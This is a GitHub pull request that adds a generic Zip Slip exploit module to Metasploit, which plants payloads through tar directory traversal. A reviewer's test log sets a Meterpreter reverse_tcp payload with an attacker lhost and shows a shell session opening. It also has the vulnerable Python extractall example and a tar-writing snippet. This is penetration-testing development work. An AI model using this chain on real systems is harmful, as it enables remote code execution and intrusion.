Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Add Generic Exploit for Zip Slip Vulnerability #12302

Merged
merged 3 commits into from Sep 12, 2019
Merged

Conversation

@wchen-r7
Copy link
Contributor

wchen-r7 commented Sep 9, 2019

Description

This is a generic arbitrary file overwrite technique, which typically results in remote command execution. This targets a simple yet widespread vulnerability that has been seen affecting a variety of popular products including HP, Amazon, Apache, Cisco, etc. The idea is that often archive extraction libraries have no mitigations against directory traversal attacks. If an application uses it, there is a risk when opening an archive that is maliciously modified, and result in the embedded payload being written to an arbitrary location (such as a web root), and result in remote code execution.

Vulnerable Application

Since this is a generic module, it does not target a specific application. However, what it targets is potentially unsafe TAR extraction libraries, so if you happen to notice that, then you can consider using this.

For example, let's say you have a Python library that has code that can extract a TAR file like this:

import tarfile
t = tarfile.open('example.tar')
t.extractall()

The above will extract a TAR file, but the extractall function does not have any protection (especially against directory traversal attacks), so it's dangerous.

An example that is safe from the attack is the tar command, for example:

$ tar -xf msf.tar 
../payload.bin: Path contains '..'
tar: Error exit delayed from previous errors.

Verification Steps

  1. Save the above Python script
  2. Generate the malicious TAR file
  3. Run Python on the TAR file:
import tarfile
t = tarfile.open('example.tar')
t.extractall()
@space-r7 space-r7 self-assigned this Sep 11, 2019
@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Sep 11, 2019

Code and docs lgtm!

Tested:

msf5 > use exploit/multi/fileformat/zip_slip
msf5 exploit(multi/fileformat/zip_slip) > set targetpayloadpath ../../test_prog
targetpayloadpath => ../../test_prog
msf5 exploit(multi/fileformat/zip_slip) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/fileformat/zip_slip) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/fileformat/zip_slip) > run

[+] msf.tar stored at /Users/space/.msf4/local/msf.tar
[*] When extracted, the payload is expected to extract to:
[*] ../../test_prog
msf5 exploit(multi/fileformat/zip_slip) > use multi/handler
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
payload => linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (985320 bytes) to 192.168.37.183
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.183:40444) at 2019-09-11 12:09:26 -0500

meterpreter > getuid
Server username: uid=1000, gid=1000, euid=1000, egid=1000
meterpreter > sysinfo
Computer     : 192.168.37.183
OS           : Ubuntu 18.04 (Linux 4.18.0-15-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > 
path = Rex::FileUtils.normalize_unix_path(fname)
tar = StringIO.new
Rex::Tar::Writer.new(tar) do |t|
t.add_file(path, 0644) do |f|

This comment has been minimized.

Copy link
@space-r7

space-r7 Sep 11, 2019

Contributor

Looking over once more, I do have one question. Could the permissions for the payload be 0744?

This comment has been minimized.

Copy link
@wchen-r7

wchen-r7 Sep 11, 2019

Author Contributor

Yeah, 0744 or just 777 would be better. Would you like me to fix it?

This comment has been minimized.

Copy link
@space-r7

space-r7 Sep 12, 2019

Contributor

I can change that before landing. Thanks!

space-r7 added a commit that referenced this pull request Sep 12, 2019
@space-r7 space-r7 merged commit 8fe1f9d into rapid7:master Sep 12, 2019
3 checks passed
3 checks passed
Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details
msjenkins-r7 added a commit that referenced this pull request Sep 12, 2019
@space-r7

This comment has been minimized.

Copy link
Contributor

space-r7 commented Sep 12, 2019

Release Notes

This adds an exploit module that targets archive extraction libraries. Files have the potential to be extracted to arbitrary locations if the archive extraction library does not check for directory traversal attempts. In cases such as these, it is possible to write a payload to an accessible location and achieve code execution.

@tperry-r7 tperry-r7 added the rn-modules label Oct 1, 2019
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
3 participants
You can’t perform that action at this time.